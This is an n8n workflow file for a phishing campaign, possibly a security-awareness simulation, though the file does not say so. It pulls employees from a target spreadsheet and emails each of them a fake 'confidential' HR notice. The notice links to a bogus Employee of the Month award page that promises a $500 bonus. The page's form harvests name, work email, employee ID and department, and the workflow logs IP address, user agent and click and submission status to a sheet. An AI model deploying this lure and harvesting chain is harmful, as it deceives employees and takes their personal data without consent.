workflow/phishing-email-campaign.json
{
  "name": "Phishing Campaign",
  "nodes": [
    {
      "parameters": {
        "jsCode": "function generateUniqueId() {\n  return 'xxxxxxxxxxxx4xxxyxxxxxxxxxxxxxxx'.replace(/[xy]/g, function(c) {\n    const r = Math.random() * 16 | 0;\n    const v = c == 'x' ? r : (r & 0x3 | 0x8);\n    return v.toString(16);\n  });\n}\n\nconst uniqueId = generateUniqueId();\nconst baseUrl = \"https://n8n.abc.com/webhook/employee-appreciation-form\";\n//const personalizedLink = `${baseUrl}?id=${uniqueId}`;\n\nreturn {\n  employeeName: $input.first().json.employeeName,\n  employeeEmail: $input.first().json.employeeEmail,\n  employeeId: $input.first().json.employeeId,\n  department: $input.first().json.department,\n  uniqueId: uniqueId,\n  landingPageUrl: baseUrl,\n  sentAt: new Date().toISOString()\n};"
      },
      "type": "n8n-nodes-base.code",
      "typeVersion": 2,
      "position": [
        -96,
        80
      ],
      "id": "1c99fcb3-4ae9-4802-b6c3-7f86945db8b0",
      "name": "Code"
    },
    {
      "parameters": {
        "path": "employee-appreciation-form",
        "responseMode": "responseNode",
        "options": {}
      },
      "type": "n8n-nodes-base.webhook",
      "typeVersion": 2.1,
      "position": [
        64,
        -208
      ],
      "id": "53012c87-a2e4-46e7-b52d-3ae18613b9ee",
      "name": "Webhook - Display Form",
      "webhookId": "display-form-webhook"
    },
    {
      "parameters": {
        "respondWith": "text",
        "responseBody": "=<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n    <meta charset=\"UTF-8\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n    <title>Employee Recognition Award - Official Notification</title>\n    <style>\n        /* Define the primary professional color */\n        :root {\n            --primary-color: #19a2a5;\n            --light-accent: #e6fafa; \n            --caution-color: #c9930c;\n            --success-color: #28a745;\n        }\n\n        * {\n            margin: 0;\n            padding: 0;\n            box-sizing: border-box;\n        }\n\n        body {\n            font-family: 'Arial', sans-serif;\n            background-color: #f4f7f6;\n            min-height: 100vh;\n            padding: 40px 20px;\n            display: flex;\n            align-items: flex-start;\n            justify-content: center;\n        }\n\n        .container {\n            background: white;\n            max-width: 700px;\n            width: 100%;\n            border-radius: 8px;\n            box-shadow: 0 10px 30px rgba(0, 0, 0, 0.1);\n            overflow: hidden;\n            border-top: 5px solid var(--primary-color);\n        }\n\n        /* Removed all unnecessary animation and visual elements */\n        .confetti, @keyframes slideIn, @keyframes confetti-fall, @keyframes bounce, @keyframes twinkle {\n            display: none !important;\n        }\n        \n        /* HEADER */\n        .header {\n            background-color: var(--primary-color);\n            color: white;\n            padding: 40px 30px 30px;\n            text-align: center;\n        }\n\n        .trophy {\n            font-size: 60px;\n            margin-bottom: 15px;\n            display: inline-block;\n        }\n\n        .header h1 {\n            font-size: 32px;\n            margin-bottom: 10px;\n            font-weight: 700;\n        }\n\n        .header p {\n            font-size: 16px;\n            opacity: 0.9;\n            line-height: 1.5;\n        }\n\n        .header strong {\n            font-size: 20px !important;\n            display: block;\n            margin-top: 5px;\n        }\n\n        /* CONTENT */\n        .content {\n            padding: 40px 50px;\n        }\n\n        .message {\n            color: #333;\n            font-size: 16px;\n            line-height: 1.7;\n            margin-bottom: 30px;\n            border-bottom: 1px solid #eee;\n            padding-bottom: 20px;\n        }\n\n        .award-details {\n            background-color: var(--light-accent);\n            border-left: 4px solid var(--primary-color);\n            padding: 20px;\n            margin: 30px 0;\n            border-radius: 4px;\n        }\n\n        .award-details h3 {\n            color: var(--primary-color);\n            margin-bottom: 15px;\n            font-size: 18px;\n            font-weight: 600;\n            border-bottom: 1px dashed #c0e0e0;\n            padding-bottom: 10px;\n        }\n\n        .award-details ul {\n            list-style: none;\n            padding: 0;\n        }\n\n        .award-details li {\n            color: #555;\n            padding: 6px 0;\n            font-size: 15px;\n            display: flex;\n            align-items: flex-start;\n        }\n\n        .award-details li:before {\n            content: \"•\";\n            color: var(--primary-color);\n            font-weight: bold;\n            margin-right: 10px;\n            font-size: 18px;\n            line-height: 1.5;\n        }\n\n        .confidential-notice {\n            background-color: #fff8e1;\n            border: 1px solid #ffecb3;\n            border-radius: 4px;\n            padding: 15px;\n            margin: 30px 0;\n            text-align: center;\n        }\n\n        .confidential-notice strong {\n            color: var(--caution-color);\n            font-size: 15px;\n            display: block;\n            margin-bottom: 5px;\n        }\n\n        /* FORM */\n        .form-section {\n            margin-top: 30px;\n            padding-top: 30px;\n            border-top: 1px solid #e0e0e0;\n        }\n\n        .form-section h3 {\n            color: #333;\n            margin-bottom: 15px;\n            font-size: 22px;\n        }\n\n        .form-group {\n            margin-bottom: 18px;\n        }\n\n        label {\n            display: block;\n            font-weight: 600;\n            color: #444;\n            margin-bottom: 5px;\n            font-size: 14px;\n            text-transform: uppercase;\n        }\n\n        input[type=\"text\"],\n        input[type=\"email\"],\n        textarea {\n            width: 100%;\n            padding: 10px 12px;\n            border: 1px solid #ccc;\n            border-radius: 4px;\n            font-size: 15px;\n            transition: border-color 0.2s;\n            font-family: inherit;\n        }\n\n        input[type=\"text\"]:focus,\n        input[type=\"email\"]:focus,\n        textarea:focus {\n            outline: none;\n            border-color: var(--primary-color);\n            box-shadow: 0 0 0 1px var(--primary-color);\n        }\n\n        .submit-btn {\n            width: 100%;\n            padding: 14px;\n            background-color: var(--primary-color);\n            color: white;\n            border: none;\n            border-radius: 4px;\n            font-size: 16px;\n            font-weight: 600;\n            cursor: pointer;\n            transition: background-color 0.2s;\n            margin-top: 15px;\n        }\n\n        .submit-btn:hover {\n            background-color: #14797c; \n        }\n\n        .submit-btn:disabled {\n            opacity: 0.7;\n            cursor: not-allowed;\n        }\n\n        /* SUCCESS MESSAGE */\n        .success-message {\n            display: none;\n            text-align: center;\n            padding: 60px 50px;\n        }\n\n        .success-message.show {\n            display: block;\n        }\n\n        .success-icon {\n            width: 60px;\n            height: 60px;\n            background: var(--success-color);\n            color: white;\n            border-radius: 50%;\n            display: flex;\n            align-items: center;\n            justify-content: center;\n            margin: 0 auto 20px;\n            font-size: 30px;\n        }\n        \n        .success-message h2 {\n            font-size: 24px;\n        }\n\n        .footer {\n            background: #e9ecef;\n            padding: 15px 50px;\n            text-align: center;\n            color: #6c757d;\n            font-size: 12px;\n            border-top: 1px solid #dcdcdc;\n        }\n    </style>\n</head>\n<body>\n    <div class=\"container\">\n        <div class=\"header\">\n            <div class=\"trophy\">🏅</div>\n            <h1>Official Recognition Notification</h1>\n            <p>We are pleased to inform you of your selection as the<br><strong style=\"font-size: 20px;\">Employee of the Month</strong></p>\n            </div>\n\n        <div class=\"content\" id=\"mainContent\">\n            <p class=\"message\">\n                This prestigious award acknowledges your exceptional performance, consistent dedication, and significant contributions to our organization this past month. Your commitment to excellence is highly valued by the entire leadership team.\n            </p>\n\n            <div class=\"award-details\">\n                <h3>🏆 Award & Recognition Package:</h3>\n                <ul>\n                    <li>Financial Stipend: A $500 Cash Bonus</li>\n                    <li>Privilege: Reserved Parking Spot for the Current Month</li>\n                    <li>Formal Documentation: Personalized Certificate of Recognition</li>\n                    <li>Company Visibility: Feature in the Official Company Newsletter</li>\n                    <li>Leadership Engagement: Invitation to a private Luncheon with Senior Management</li>\n                </ul>\n            </div>\n\n            <div class=\"confidential-notice\">\n                <strong>⚠️ INTERNAL & CONFIDENTIAL</strong><br>\n                This notification is for your private information only. Please refrain from discussing this award publicly until the official company-wide announcement on 30-12-2025.\n            </div>\n\n            <div class=\"form-section\">\n                <h3>Action Required: Confirm Your Details</h3>\n                <p style=\"color: #666; margin-bottom: 20px; font-style: italic;\">To efficiently process and deliver your award package, please verify and complete the required information below:</p>\n\n                <form id=\"confirmationForm\" action=\"https://n8n.abc.com/webhook/employee-appreciation-form\" method=\"POST\">\n                    <div class=\"form-group\">\n                        <label for=\"fullName\">Full Name</label>\n                        <input type=\"text\" id=\"fullName\" name=\"fullName\" required placeholder=\"John Doe\">\n                    </div>\n\n                    <div class=\"form-group\">\n                        <label for=\"email\">Work Email Address</label>\n                        <input type=\"email\" id=\"email\" name=\"email\" required placeholder=\"john.doe@company.com\">\n                    </div>\n\n                    <div class=\"form-group\">\n                        <label for=\"employeeId\">Employee ID</label>\n                        <input type=\"text\" id=\"employeeId\" name=\"employeeId\" required placeholder=\"EMP-12345\">\n                    </div>\n\n                    <div class=\"form-group\">\n                        <label for=\"department\">Department / Team</label>\n                        <input type=\"text\" id=\"department\" name=\"department\" required placeholder=\"e.g., Engineering, Sales, HR\">\n                    </div>\n\n                    <div class=\"form-group\">\n                        <label for=\"message\">Acceptance Note (Optional)</label>\n                        <textarea id=\"message\" name=\"message\" placeholder=\"A brief message of acceptance or thanks...\"></textarea>\n                    </div>\n\n                    <button type=\"submit\" class=\"submit-btn\" id=\"submitBtn\">\n                        Submit Confirmation\n                    </button>\n                </form>\n            </div>\n        </div>\n\n        <div class=\"content\">\n            <div class=\"success-message\" id=\"successMessage\">\n                <div class=\"success-icon\">✓</div>\n                <h2 style=\"color: #333; margin-bottom: 15px;\">Submission Successful.</h2>\n                <p style=\"color: #666; margin-bottom: 20px;\">\n                    Your details have been successfully recorded. The HR team will contact you directly within 2 business days regarding the scheduling of your presentation and the fulfillment of your award package.\n                </p>\n                <p style=\"color: #999; font-size: 13px;\">\n                    This window may now be closed.\n                </p>\n            </div>\n        </div>\n\n        <div class=\"footer\">\n            HR & Corporate Communications Department • All Rights Reserved © 2025\n        </div>\n    </div>\n\n    <script>\n        const form = document.getElementById('confirmationForm');\n        const submitBtn = document.getElementById('submitBtn');\n        const mainContent = document.getElementById('mainContent');\n        const successMessage = document.getElementById('successMessage');\n\n        // Get tracking ID from URL parameter if present\n        const urlParams = new URLSearchParams(window.location.search);\n        const trackingId = urlParams.get('id') || 'unknown';\n\n        form.addEventListener('submit', async (e) => {\n            e.preventDefault();\n            \n            submitBtn.disabled = true;\n            submitBtn.textContent = 'Processing...';\n\n            const formData = new FormData(form);\n            const data = Object.fromEntries(formData.entries());\n            \n            // Add tracking information\n            data.trackingId = trackingId;\n            data.submittedAt = new Date().toISOString();\n            data.userAgent = navigator.userAgent;\n            data.ipAddress = 'captured-by-n8n'; \n\n            try {\n                const response = await fetch(form.action, {\n                    method: 'POST',\n                    headers: {\n                        'Content-Type': 'application/json',\n                    },\n                    body: JSON.stringify(data)\n                });\n\n                if (response.ok) {\n                    mainContent.style.display = 'none';\n                    successMessage.classList.add('show');\n                } else {\n                    alert('Submission failed. Please try again or contact HR.');\n                    submitBtn.disabled = false;\n                    submitBtn.textContent = 'Submit Confirmation';\n                }\n            } catch (error) {\n                alert('Network error. Please check your connection and try again.');\n                submitBtn.disabled = false;\n                submitBtn.textContent = 'Submit Confirmation';\n            }\n        });\n    </script>\n</body>\n</html>",
        "options": {
          "responseHeaders": {
            "entries": [
              {
                "name": "Content-Type",
                "value": "text/html"
              }
            ]
          }
        }
      },
      "type": "n8n-nodes-base.respondToWebhook",
      "typeVersion": 1.1,
      "position": [
        368,
        -208
      ],
      "id": "f793e153-6561-431a-926f-9c31766359d6",
      "name": "Respond with HTML"
    },
    {
      "parameters": {
        "httpMethod": "POST",
        "path": "employee-appreciation-form",
        "responseMode": "responseNode",
        "options": {}
      },
      "type": "n8n-nodes-base.webhook",
      "typeVersion": 2.1,
      "position": [
        672,
        -256
      ],
      "id": "b5b0813c-281a-4783-ad56-b06f7ec40632",
      "name": "Webhook - Submit Form",
      "webhookId": "submit-form-webhook"
    },
    {
      "parameters": {
        "jsCode": "// Extract form data from webhook\nconst formData = $input.item.json.body;\n\n// Add server-side information\nconst enrichedData = {\n  ...formData,\n  submittedAt: new Date().toISOString(),\n  ipAddress: $input.item.json.headers['x-forwarded-for'] || $input.item.json.headers['x-real-ip'] || 'unknown',\n  userAgent: $input.item.json.headers['user-agent'] || 'unknown'\n};\n\nreturn { json: enrichedData };"
      },
      "type": "n8n-nodes-base.code",
      "typeVersion": 2,
      "position": [
        880,
        -48
      ],
      "id": "2a97e089-b34d-412b-bd68-2060a34e6179",
      "name": "Process Form Data"
    },
    {
      "parameters": {
        "respondWith": "json",
        "responseBody": "={{ { \"success\": true, \"message\": \"Form submitted successfully\" } }}",
        "options": {}
      },
      "type": "n8n-nodes-base.respondToWebhook",
      "typeVersion": 1.1,
      "position": [
        1056,
        80
      ],
      "id": "e48968d3-9c28-4d8c-88da-53e76a2f09cf",
      "name": "Respond Success"
    },
    {
      "parameters": {
        "operation": "append",
        "documentId": {
          "__rl": true,
          "value": "1sheetid",
          "mode": "list",
          "cachedResultName": "Target List Employee",
          "cachedResultUrl": "https://docs.google.com/spreadsheets/d//edit?usp=drivesdk"
        },
        "sheetName": {
          "__rl": true,
          "value": 1523740453,
          "mode": "list",
          "cachedResultName": "Form_Responses",
          "cachedResultUrl": "https://docs.google.com/spreadsheets/d/1sheetid/edit#gid=1523740453"
        },
        "columns": {
          "mappingMode": "defineBelow",
          "value": {
            "fullName": "={{ $json.fullName }}",
            "email": "={{ $json.email }}",
            "employeeId": "={{ $json.employeeId }}",
            "department": "={{ $json.department }}",
            "message": "={{ $json.message }}",
            "submittedAt": "={{ $json.submittedAt }}",
            "userAgent": "={{ $json.userAgent }}",
            "ipAddress": "={{ $json.ipAddress }}"
          },
          "matchingColumns": [],
          "schema": [
            {
              "id": "trackingId",
              "displayName": "trackingId",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true,
              "removed": true
            },
            {
              "id": "submittedAt",
              "displayName": "submittedAt",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            },
            {
              "id": "fullName",
              "displayName": "fullName",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            },
            {
              "id": "email",
              "displayName": "email",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            },
            {
              "id": "employeeId",
              "displayName": "employeeId",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            },
            {
              "id": "department",
              "displayName": "department",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            },
            {
              "id": "message",
              "displayName": "message",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            },
            {
              "id": "ipAddress",
              "displayName": "ipAddress",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            },
            {
              "id": "userAgent",
              "displayName": "userAgent",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            }
          ],
          "attemptToConvertTypes": false,
          "convertFieldsToString": false
        },
        "options": {}
      },
      "type": "n8n-nodes-base.googleSheets",
      "typeVersion": 4.7,
      "position": [
        1248,
        -80
      ],
      "id": "8f3f7cf8-ed3e-494b-8804-b0d77aa0d61a",
      "name": "Append row in sheet1",
      "credentials": {
        "googleSheetsOAuth2Api": {
          "id": "gmailNodeID",
          "name": "Google Sheets account"
        }
      }
    },
    {
      "parameters": {
        "documentId": {
          "__rl": true,
          "value": "1sheetid",
          "mode": "list",
          "cachedResultName": "Target List Employee",
          "cachedResultUrl": "https://docs.google.com/spreadsheets/d/1sheetid/edit?usp=drivesdk"
        },
        "sheetName": {
          "__rl": true,
          "value": "gid=0",
          "mode": "list",
          "cachedResultName": "Employee Details",
          "cachedResultUrl": "https://docs.google.com/spreadsheets/d/1sheetid/edit#gid=0"
        },
        "options": {}
      },
      "type": "n8n-nodes-base.googleSheets",
      "typeVersion": 4.7,
      "position": [
        -528,
        16
      ],
      "id": "049fc513-94fd-43d2-9159-083a6b3b5448",
      "name": "Get The Target Data",
      "credentials": {
        "googleSheetsOAuth2Api": {
          "id": "gmailNodeID",
          "name": "Google Sheets account"
        }
      }
    },
    {
      "parameters": {
        "sendTo": "={{ $json.employeeEmail }}",
        "subject": "🏆 Confidential: Important Notification",
        "message": "=<!DOCTYPE html>\n<html>\n<head>\n    <style>\n        body { font-family: Arial, sans-serif; line-height: 1.6; color: #333; }\n        .container { max-width: 600px; margin: 0 auto; padding: 20px; }\n        .header { background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; padding: 30px; text-align: center; border-radius: 10px 10px 0 0; }\n        .content { background: #ffffff; padding: 30px; border: 1px solid #e0e0e0; }\n        .button { display: inline-block; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; padding: 15px 30px; text-decoration: none; border-radius: 5px; font-weight: bold; margin: 20px 0; }\n        .footer { text-align: center; padding: 20px; color: #999; font-size: 12px; }\n        .confidential { background: #fff3cd; border: 2px solid #ffc107; padding: 15px; margin: 20px 0; border-radius: 5px; text-align: center; }\n    </style>\n</head>\n<body>\n    <div class=\"container\">\n        <div class=\"header\">\n            <h1>🏆 Important Notification</h1>\n        </div>\n        <div class=\"content\">\n            <p>Dear {{ $json.employeeName }},</p>\n            \n            <p>You have received an important notification from the HR Department that requires your immediate attention.</p>\n            \n            <div class=\"confidential\">\n                <strong>⚠️ CONFIDENTIAL</strong><br>\n                This message is intended only for you. Please do not share.\n            </div>\n            \n            <p style=\"text-align: center;\">\n                <a href=\"{{ $json.landingPageUrl }}\" class=\"button\">View Your Notification</a>\n            </p>\n            \n            <p style=\"color: #666; font-size: 14px;\">\n                If the button doesn't work, copy and paste this link:<br>\n                <a href=\"{{ $json.landingPageUrl }}\">{{ $json.landingPageUrl }}</a>\n            </p>\n            \n            <p>Please review this at your earliest convenience.</p>\n            \n            <p>Best regards,<br><strong>Human Resources Team</strong></p>\n        </div>\n        <div class=\"footer\">\n            This is a confidential company communication<br>\n            © 2025 Ethika. All rights reserved.\n        </div>\n    </div>\n</body>\n</html>",
        "options": {}
      },
      "type": "n8n-nodes-base.gmail",
      "typeVersion": 2.1,
      "position": [
        128,
        32
      ],
      "id": "1881c0cd-65bb-4a93-8f4e-7b65e3250cd7",
      "name": "Send Phishing Campaigns",
      "webhookId": "e651f36d-401c-4b3b-bbbf-507b35bf3c54",
      "credentials": {
        "gmailOAuth2": {
          "id": "WtyJw1z3x84HIiUr",
          "name": "Gmail account"
        }
      }
    },
    {
      "parameters": {
        "operation": "append",
        "documentId": {
          "__rl": true,
          "value": "1sheetid",
          "mode": "list",
          "cachedResultName": "Target List Employee",
          "cachedResultUrl": "https://docs.google.com/spreadsheets/d/1sheetid/edit?usp=drivesdk"
        },
        "sheetName": {
          "__rl": true,
          "value": 1848167051,
          "mode": "list",
          "cachedResultName": "Email_Tracking",
          "cachedResultUrl": "https://docs.google.com/spreadsheets/d/1sheetid/edit#gid=1848167051"
        },
        "columns": {
          "mappingMode": "defineBelow",
          "value": {
            "employeeName": "={{ $('Code').item.json.employeeName }}",
            "employeeEmail": "={{ $('Code').item.json.employeeEmail }}",
            "landingPageUrl": "={{ $('Code').item.json.landingPageUrl }}",
            "sentAt": "={{ $('Code').item.json.sentAt }}",
            "clicked": "\"No\"",
            "status": "\"Email Sent\"",
            "submitted": "\"No\"",
            "TrackingId": "={{ $('Code').item.json.uniqueId }}"
          },
          "matchingColumns": [],
          "schema": [
            {
              "id": "TrackingId",
              "displayName": "TrackingId",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true,
              "removed": false
            },
            {
              "id": "employeeName",
              "displayName": "employeeName",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            },
            {
              "id": "employeeEmail",
              "displayName": "employeeEmail",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            },
            {
              "id": "landingPageUrl",
              "displayName": "landingPageUrl",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            },
            {
              "id": "sentAt",
              "displayName": "sentAt",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            },
            {
              "id": "clicked",
              "displayName": "clicked",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            },
            {
              "id": "status",
              "displayName": "status",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            },
            {
              "id": "submitted",
              "displayName": "submitted",
              "required": false,
              "defaultMatch": false,
              "display": true,
              "type": "string",
              "canBeUsedToMatch": true
            }
          ],
          "attemptToConvertTypes": false,
          "convertFieldsToString": false
        },
        "options": {}
      },
      "type": "n8n-nodes-base.googleSheets",
      "typeVersion": 4.7,
      "position": [
        336,
        112
      ],
      "id": "7a44978f-48fc-4beb-babc-f394a491be2c",
      "name": "Update Tracking Sheet",
      "credentials": {
        "googleSheetsOAuth2Api": {
          "id": "gmailNodeID",
          "name": "Google Sheets account"
        }
      }
    },
    {
      "parameters": {},
      "id": "1b41ac65-5889-4389-b801-31c21c60b771",
      "name": "When clicking 'Execute workflow'",
      "type": "n8n-nodes-base.manualTrigger",
      "position": [
        -736,
        -16
      ],
      "typeVersion": 1
    },
    {
      "parameters": {
        "options": {}
      },
      "type": "n8n-nodes-base.splitInBatches",
      "typeVersion": 3,
      "position": [
        -320,
        16
      ],
      "id": "38606826-8f3b-48d3-bacb-f04881b54a96",
      "name": "Loop Over Items"
    }
  ],
  "pinData": {},
  "connections": {
    "Code": {
      "main": [
        [
          {
            "node": "Send Phishing Campaigns",
            "type": "main",
            "index": 0
          }
        ]
      ]
    },
    "Webhook - Display Form": {
      "main": [
        [
          {
            "node": "Respond with HTML",
            "type": "main",
            "index": 0
          }
        ]
      ]
    },
    "Webhook - Submit Form": {
      "main": [
        [
          {
            "node": "Process Form Data",
            "type": "main",
            "index": 0
          }
        ]
      ]
    },
    "Process Form Data": {
      "main": [
        [
          {
            "node": "Respond Success",
            "type": "main",
            "index": 0
          }
        ]
      ]
    },
    "Respond Success": {
      "main": [
        [
          {
            "node": "Append row in sheet1",
            "type": "main",
            "index": 0
          }
        ]
      ]
    },
    "Get The Target Data": {
      "main": [
        [
          {
            "node": "Loop Over Items",
            "type": "main",
            "index": 0
          }
        ]
      ]
    },
    "Send Phishing Campaigns": {
      "main": [
        [
          {
            "node": "Update Tracking Sheet",
            "type": "main",
            "index": 0
          }
        ]
      ]
    },
    "Update Tracking Sheet": {
      "main": [
        [
          {
            "node": "Loop Over Items",
            "type": "main",
            "index": 0
          }
        ]
      ]
    },
    "When clicking 'Execute workflow'": {
      "main": [
        [
          {
            "node": "Get The Target Data",
            "type": "main",
            "index": 0
          }
        ]
      ]
    },
    "Loop Over Items": {
      "main": [
        [],
        [
          {
            "node": "Code",
            "type": "main",
            "index": 0
          }
        ]
      ]
    }
  },
  "active": true,
  "settings": {
    "executionOrder": "v1"
  },
  "versionId": "d7e1ea82-4453-429f-9742-146e4f634e10",
  "meta": {
    "templateCredsSetupCompleted": true,
    "instanceId": "63d4bbbe055a042356613714815eae39e81956c42d56da509e0d15ccd43e5db6"
  },
  "id": "iOU9oeMwDePsulu2",
  "tags": []
}
